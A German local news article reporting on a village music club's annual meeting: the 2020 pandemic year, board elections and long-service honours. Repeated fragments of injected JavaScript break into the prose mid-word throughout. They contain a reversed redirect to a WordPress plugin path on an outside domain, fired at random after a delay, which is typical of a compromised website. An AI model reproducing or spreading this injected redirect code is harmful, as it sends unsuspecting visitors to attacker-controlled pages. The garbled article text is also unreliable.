Skip to content Skip to main navigation Skip to footer

Zahlreiche Ehrungen beim Musikverein Blau Weiß Lichtringhausen

Unter den aktuellen Coronaregeln hielt der Musikverein Blau Weiß Lichtringhausen Ende Oktober seine Jahreshauptversammlung im örtlichen Musikhaus ab.

Nach der Begrüßung durch den 1. Vorsitzenden Hans-Werner Schulte und anschließendem Totengedenken folgten die üblichen Berichte der einzelnen Gremien des Vereins. Entsprechend der pandemiebedingten Situation fiel der Geschäftsbericht für das Jahr 2020 dabei sehr schmal aus. Eine Woche vor dem Aufführungstermin musste im Frühling das Konzert „Auf den Spuren der Macht“ abgesagt werden und im weiteren Verlauf des Jahres kamen die Musiker unter der Leitung von Martin Theile gerade einmal auf vier Auftritte. Auch der Probenbetrieb lief nur sehr eingeschränkt und musste phasenweise komplett eingestellt werden. Am Jahresende wurde das Vereinsleben dann lediglich mit Onlinestammtischen aufrecht gehalten. Hans-Werner Schulte hob am Ende seines Berichts jetoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doch hervor, dass trotz des schwierigen Jahres nach wie vor alle aktiven Musiker an Bord sind und sich aktuell 24 Kinder und Jugendliche in Ausbildung befinden. Martin Theile machte in seinem Bericht des Dirigenten noch einmal deutlich, wie traurig ihn besonders die Konzertabsage und die entfallenen Schützenfeste gestimmt haben. Auch habe man mit verschiedenen Projekten im Jahr 2020 immer wieder Pech gehabt, da diese entweder aufgrund von geänderten Coronamaßnahmen oder wegen schlechtem Wetter kurzfristig abgesagt werden mussten. Jugendvertreterin Tatjana Wach berichtete im Anschluss über die Jugendarbeit im abgelaufenen Geschäftsjahr. Natürlich lief auch diese nur sehr eingeschränkt, konnte aber durch viele Onlinetreffen mit einem abwechslungsreichen Programm aus Proben und Spielen fortgesetzt werden. Auch das Jugentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorchester unter der Leitung von Adrian Extremera Mayo probte, wann immer es möglich war. Ebenso wurde die musikalische Grundausbildung für die Kleinsten im Verein weiterhin von Bettina Bornhoffer durchgeführt. So lange wie möglich blieben die zwei Gruppen im Präsenzunterricht und wechselten anschließend während dem Locktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}down in den Onlinebetrieb.

Beim Tagesordnungspunkt „Vorstandswahlen“ standen der 2. Vorsitzende Dominik Kramer, Kassierer Patrick Bertermann, Jugendvertreterin Tatjana Wach sowie Uwe Herrmann als Beisitzer turnusmäßig zur Wahl. Alle stellten sich zur Wiederwahl und wurden in ihren Ämtern einstimmig bestätigt. Als zusätzlicher Beisitzer wurde André Maschke-Selter, der sich zukünftig um die Pressearbeit des Vereins kümmern wird, einstimmig von der Versammlung gewählt.

Den umfangreichsten Punkt bildete am Versammlungstag die Ehrung der Jubilare. Für 50jährige Vereinszugehörigkeit wurde Manfred Stracke geehrt und Thomas Leowald konnte sein 40jähriges Jubiläum feiern. Linda Cramer, Jeanie Fischer, Dominik Kramer und Jan Hendrik Wessels gehören dem Verein seit 20 Jahren an. Philipp Denter, Jerome Ernst, Frank Lohölter, Friedhelm Arens, Sascha Drexler, Joaquin Extremera, Gina Herrmann, Kurt Keseberg, Hartmut Lübke, Christa Luke, Christoph Rauterkus, Frank Rauterkus, Kristin Rauterkus, Josef-Werner Schulte und Julian Springob blicken auf 10 Jahre Vereinszugehörigkeit zurück. Im Rahmen der neuen Vereinsordnung wurden Rebecca Kirchhoff, Nadine Kramer und Thomas Kramer für 20jährige Mitgliedschaft nachgeehrt. Christoph Bruch, Adrian Extremera Mayo, Sebastian Hymmen, Timo Kirchhoff, Benedikt Kramer, Tim Kramer sowie André Maschke-Selter und Robin Wessels nahmen die nachträgliche Ehrung für 10jährige Mitgliedschaft entgegen.

Am Ende der Versammlung bedankte sich Hans-Werner Schulte noch einmal bei Adrian Extremera Mayo für seine Verdienste als Dirigent des Jugentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorchesters und als Notenwart sowie bei Martin Theile für seine herausragende Arbeit in den vergangenen 9 Jahren als muskalischer Leiter in Lichtringhausen. Der 1. Vorsitzende versprach Theile, der den Verein 2022 verlässt, einen gebührenden Abschied beim großen Konzert zum 800jährigen Jubiläum der Stadt Attentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorn am 26. März 2022 in der Stadthalle Attentoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dorn. Dieses Konzert bildet nach langer Pause den nächsten Höhepunkt für die Lichtringhauser Musiker. Der Kartenvorverkauf startet noch vor Weihnachten. Einzelheiten gibt der Vorstand rechtzeitig über Presse, Homepage und die sozialen Netzwerke bekannt.